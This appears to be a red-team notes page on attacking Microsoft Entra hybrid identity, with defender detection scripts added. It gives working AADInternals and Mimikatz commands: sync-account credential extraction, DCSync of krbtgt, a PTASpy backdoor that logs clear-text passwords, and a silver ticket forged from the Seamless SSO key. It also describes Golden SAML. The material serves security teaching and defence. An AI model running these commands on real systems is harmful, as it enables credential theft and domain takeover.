Hybrid Identity

Last updated 3 months ago

Organizations have resources, devices and applications both on-premises and in the cloud. Many enterprises use their on-prem AD identities to access Azure applications to avoid managing separate identities in both places.

A hybrid identity is a single user identity used for authentication and authorization to all resources, regardless of where they are located.

Entra Connect

An on-premises AD can be integrated with Entra ID using Entra Connect with the following methods. Every method supports Single Sign-on (SSO):

  • Password Hash Sync (PHS)

  • Pass-Through Authentication (PTA)

  • Federation

PHS (Password Hash Sync)

PHS syncs users and a hash of their password hashes (not the clear-text passwords or the original hashes) from on-prem AD to Entra ID. This is the simplest and most popular method for getting a hybrid identity.

PHS is required for features like Identity Protection and AAD Domain Services.

By default, password expiry and account expiry are not reflected in Entra ID. That means a user whose on-prem password has expired can continue to access Azure resources using the old password.

On-prem, an account named MSOL_<installationID> is created automatically. This account has replication (DCSync) permissions in the on-prem AD.

Enumerate MSOL users:

Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl

Once the Entra Connect server is compromised, use the commands below from the AADInternals module to extract the credentials of the MSOL_* and Sync_* accounts in clear text:

Import-Module AADInternals\AADInternals.psd1

Get-AADIntSyncCredentials

Using the creds of the MSOL_* account, we can run DCSync against the on-prem AD:

runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:defeng\krbtgt /domain:defeng.corp /dc:defeng-dc.defeng.corp"'
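A defender-side check for this section, added here and not part of the original notes: it lists the MSOL_* sync account(s) and reports every principal holding the directory replication extended rights (the rights DCSync needs) on the domain naming context, flagging anything outside an allowlist. It assumes the ActiveDirectory RSAT module and a domain-joined session; the allowlist in $ExpectedReplicators is an assumption to adjust per forest.

```powershell
# Added defender example (not from the original notes): audit the Entra Connect
# sync account(s) and every principal that holds DCSync-capable replication rights.
# Assumes the ActiveDirectory RSAT module and a domain-joined session.
Import-Module ActiveDirectory

# Well-known extended-right GUIDs used for directory replication (DCSync needs both)
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

# Principals that normally hold replication rights (assumption: adjust to your forest)
$ExpectedReplicators = @(
    'Domain Controllers',
    'ENTERPRISE DOMAIN CONTROLLERS',
    'Enterprise Read-only Domain Controllers',
    'Administrators'
)

function Get-EntraConnectSyncAccounts {
    # More than one MSOL_* account usually means a leftover from an earlier install
    Get-ADUser -Filter "SamAccountName -like 'MSOL_*'" `
        -Properties Description, PasswordLastSet, LastLogonDate |
        Select-Object SamAccountName, Enabled, PasswordLastSet, LastLogonDate, Description
}

function Get-ReplicationRightHolders {
    $domainDN = (Get-ADDomain).DistinguishedName
    $acl = Get-Acl -Path "AD:\$domainDN"
    foreach ($ace in $acl.Access) {
        $guid = $ace.ObjectType.ToString()
        if ($ace.AccessControlType -ne 'Allow' -or -not $ReplicationRights.ContainsKey($guid)) { continue }
        $name = $ace.IdentityReference.Value.Split('\')[-1]
        [pscustomobject]@{
            Identity = $ace.IdentityReference.Value
            Right    = $ReplicationRights[$guid]
            # The MSOL_* account legitimately holds these rights; anything else outside
            # the allowlist is a finding to investigate.
            Expected = ($name -like 'MSOL_*') -or ($ExpectedReplicators -contains $name)
        }
    }
}

'== Entra Connect sync accounts =='
Get-EntraConnectSyncAccounts | Format-Table -AutoSize

'== Principals with replication rights (Expected = False needs review) =='
Get-ReplicationRightHolders | Sort-Object Expected, Identity | Format-Table -AutoSize
```

The script only matches explicit replication ACEs; a principal holding GenericAll or WriteDacl on the domain object can grant itself the same rights, so those holders need a separate review. Since the MSOL_* password is recoverable from the Entra Connect server, treat that server as a Tier 0 asset: the same logon restrictions and monitoring as a domain controller.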

PTA (Pass-through Authentication)

Microsoft Entra pass-through authentication allows your users to sign in to both on-premises and cloud-based applications using the same passwords. When users sign in using Microsoft Entra ID, this feature validates users' passwords directly against your on-premises Active Directory.

Import-Module AADInternals\AADInternals.psd1

Install PTASpy into the PTA agent and collect credentials:

Install-AADIntPTASpy

All passwords are now accepted, and the captured credentials are written to C:\PTASpy\PTASpy.csv

# Get clear-text passwords from users authenticating
Get-AADIntPTASpyLog
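A detection-side example for the PTA section, added here and not part of the original notes or of AADInternals: on a PTA agent host it lists every module loaded into the agent process that is not validly Microsoft-signed, and checks for the on-disk artifacts named above. Assumptions: the agent runs as the process name in $AgentProcessName, and the script runs elevated on that host (reading a service's module list requires it).

```powershell
# Added defender example (not from the original notes): check a PTA agent host for
# tampering. Assumptions: the agent runs as the process named below and this runs
# elevated on that host; the artifact paths are the ones named in the notes above.
$AgentProcessName = 'AzureADConnectAuthenticationAgentService'
$KnownArtifacts   = @('C:\PTASpy', 'C:\PTASpy\PTASpy.csv')

function Get-SuspiciousAgentModules {
    $procs = Get-Process -Name $AgentProcessName -ErrorAction SilentlyContinue
    if (-not $procs) { Write-Warning "PTA agent process '$AgentProcessName' is not running"; return }
    foreach ($proc in $procs) {
        foreach ($mod in $proc.Modules) {
            $sig    = Get-AuthenticodeSignature -FilePath $mod.FileName
            $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            # The agent and the runtime it loads are Microsoft-signed; a module that is
            # unsigned, or signed by someone else, sitting in the authentication path
            # is exactly what a credential-capturing hook looks like.
            if ($sig.Status -ne 'Valid' -or $signer -notmatch 'O=Microsoft Corporation') {
                [pscustomobject]@{
                    Pid    = $proc.Id
                    Module = $mod.FileName
                    Status = $sig.Status
                    Signer = $signer
                }
            }
        }
    }
}

function Test-PtaSpyArtifacts {
    foreach ($path in $KnownArtifacts) {
        [pscustomobject]@{ Path = $path; Present = (Test-Path -Path $path) }
    }
}

'== Modules in the PTA agent that are not validly Microsoft-signed =='
Get-SuspiciousAgentModules | Format-Table -AutoSize
'== Known PTASpy artifacts on disk =='
Test-PtaSpyArtifacts | Format-Table -AutoSize
```

Compare the module list against a known-good agent host before raising an alert, since third-party security agents also inject signed modules into processes. A backdoored agent accepts every password, so a second signal worth watching is a drop to zero in failed sign-ins for the federated domain in the Entra sign-in logs.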

Seamless SSO

Entra Seamless SSO automatically signs users in when they are on an on-prem domain-joined machine. There is no need to enter passwords to log in to Entra ID or on-prem applications. In the on-prem AD, a computer account named AZUREADSSOACC$ is created. This account's Kerberos decryption key is shared with Entra ID.

The password/key of AZUREADSSOACC$ never changes.

This means that if we can compromise the NTLM hash of the machine account, we can create silver tickets for any synced on-prem user.

First, get the NTLM hash of the AZUREADSSOACC$ account:

Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:defeng.corp /dc:defeng-dc.defeng.corp"'

We just need the userPrincipalName and SID of the user to create the Silver ticket that can be used from any machine connected to the internet.

Create silver ticket:

Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin1 /sid:S-1-5-21-938785110-3291390659-577725712 /id:1108 /domain:defeng.corp /rc4:<> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
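A defender-side check for the Seamless SSO section, added here and not part of the original notes: it reports how old the AZUREADSSOACC$ password (the Kerberos decryption key shared with Entra ID) is and whether it exceeds a rollover threshold. Assumptions: the ActiveDirectory RSAT module is available, the account is named AZUREADSSOACC as in the notes, and $MaxAgeDays is a local policy choice.

```powershell
# Added defender example (not from the original notes): report the age of the Seamless SSO
# computer account's password, which is the Kerberos decryption key shared with Entra ID.
# Assumptions: the ActiveDirectory RSAT module is available, the account is named
# AZUREADSSOACC as in the notes, and $MaxAgeDays is a local policy choice.
Import-Module ActiveDirectory
$MaxAgeDays = 30

function Get-SeamlessSsoKeyStatus {
    $acct = Get-ADComputer -Filter 'Name -eq "AZUREADSSOACC"' `
                -Properties PasswordLastSet, ServicePrincipalNames
    if (-not $acct) { Write-Warning 'AZUREADSSOACC not found; Seamless SSO may not be enabled'; return }
    $ageDays = [int]((Get-Date) - $acct.PasswordLastSet).TotalDays
    [pscustomobject]@{
        Account         = $acct.SamAccountName
        Enabled         = $acct.Enabled
        PasswordLastSet = $acct.PasswordLastSet
        KeyAgeDays      = $ageDays
        # A silver ticket forged from a leaked key stays usable until the key is rolled,
        # so the key age is the window an attacker keeps after a one-time leak.
        NeedsRollover   = ($ageDays -gt $MaxAgeDays)
        SPNs            = ($acct.ServicePrincipalNames -join '; ')
    }
}

Get-SeamlessSsoKeyStatus | Format-List
```

Microsoft documents rolling this key with Update-AzureADSSOForest from the AzureADSSO module shipped with Entra Connect; rolling it invalidates any ticket forged from the old key. Note that a forged ticket for this service is presented to Entra ID, not to a domain controller, so on-prem Kerberos event logs never see it; the Entra sign-in logs are where such a sign-in shows up.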

Federation

In the case of federation, a trust is established between unrelated parties, such as on-premises AD and Entra ID. Users can access cloud applications using their on-prem credentials.

ADFS

AD FS uses a claims-based identity model. Claims are simply statements (for example name, identity, group) made about users, used primarily for authorizing access to claims-based applications located anywhere on the internet.

A user is identified by an ImmutableID. It is globally unique and stored in Entra ID. The ImmutableID is stored on-prem as ms-DS-ConsistencyGuid for the user and/or can be derived from the user's GUID.

Golden SAML attack

In AD FS, a SAML response is signed by a token-signing certificate. If the certificate is compromised, it is possible to authenticate to Entra ID as ANY user in Entra ID. The certificate can be extracted from the AD FS server with Domain Admin privileges and then used from an internet-connected machine.
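A detection-side example for the Golden SAML section, added here and not part of the original notes: it correlates federated sign-ins accepted by Entra ID with token-issuance events on the AD FS server and reports sign-ins that have no issuance event within a short window. A token forged with the stolen signing certificate never passes through AD FS, so it leaves no issuance record there. Assumptions: AD FS auditing is enabled and event ID 1200 (source "AD FS Auditing", Security log) is the issuance event; the two datasets in the block are constructed sample records, not real logs, and their field names are placeholders for whatever your exports produce.

```powershell
# Added defender example (not from the original notes): flag federated sign-ins that
# Entra ID accepted without a matching token-issuance event on the AD FS server.
# A Golden SAML token is signed with the stolen key and never passes through AD FS,
# so it leaves no issuance record there. Event ID 1200 is the issuance event assumed
# here; both datasets below are constructed for the example, not real logs.
$Window = [timespan]::FromMinutes(5)

# Constructed AD FS issuance events (what an export of the Security log would give you)
$AdfsIssued = @(
    [pscustomobject]@{ Time = [datetime]'2024-05-01T09:00:10Z'; User = 'alice@corp.example'; EventId = 1200 }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T09:15:42Z'; User = 'bob@corp.example';   EventId = 1200 }
)

# Constructed Entra ID sign-in records for the federated domain
$CloudSignIns = @(
    [pscustomobject]@{ Time = [datetime]'2024-05-01T09:00:12Z'; User = 'alice@corp.example'; Ip = '203.0.113.10' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T09:16:00Z'; User = 'bob@corp.example';   Ip = '203.0.113.11' }
    [pscustomobject]@{ Time = [datetime]'2024-05-01T11:30:05Z'; User = 'admin@corp.example'; Ip = '198.51.100.7' }
)

function Find-UnissuedFederatedSignIns {
    param($SignIns, $Issued, [timespan]$MaxGap)
    foreach ($s in $SignIns) {
        # An issuance for the same user shortly before the cloud sign-in explains it
        $match = $Issued | Where-Object {
            $_.User -eq $s.User -and $_.Time -le $s.Time -and ($s.Time - $_.Time) -le $MaxGap
        }
        if (-not $match) {
            [pscustomobject]@{
                Time   = $s.Time
                User   = $s.User
                Ip     = $s.Ip
                Reason = 'No AD FS issuance event within window'
            }
        }
    }
}

Find-UnissuedFederatedSignIns -SignIns $CloudSignIns -Issued $AdfsIssued -MaxGap $Window |
    Format-Table -AutoSize
```

With the constructed data, only the admin@corp.example sign-in is reported. In practice, pull the issuance events with Get-WinEvent from the Security log on every AD FS node (auditing must be on, for example Set-AdfsProperties -AuditLevel Verbose) and the sign-in records from the Entra sign-in logs, and allow for clock skew between the sources when choosing the window. The same comparison also catches a rogue second token-signing certificate added to the federation configuration, since tokens it signs leave no issuance event either.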

If we compromise a server with the authentication agent running, we can get the credentials for users in plain text. We will first need to upload AADInternals.zip. Next, unzip it and run:

https://github.com/Gerenios/AADInternals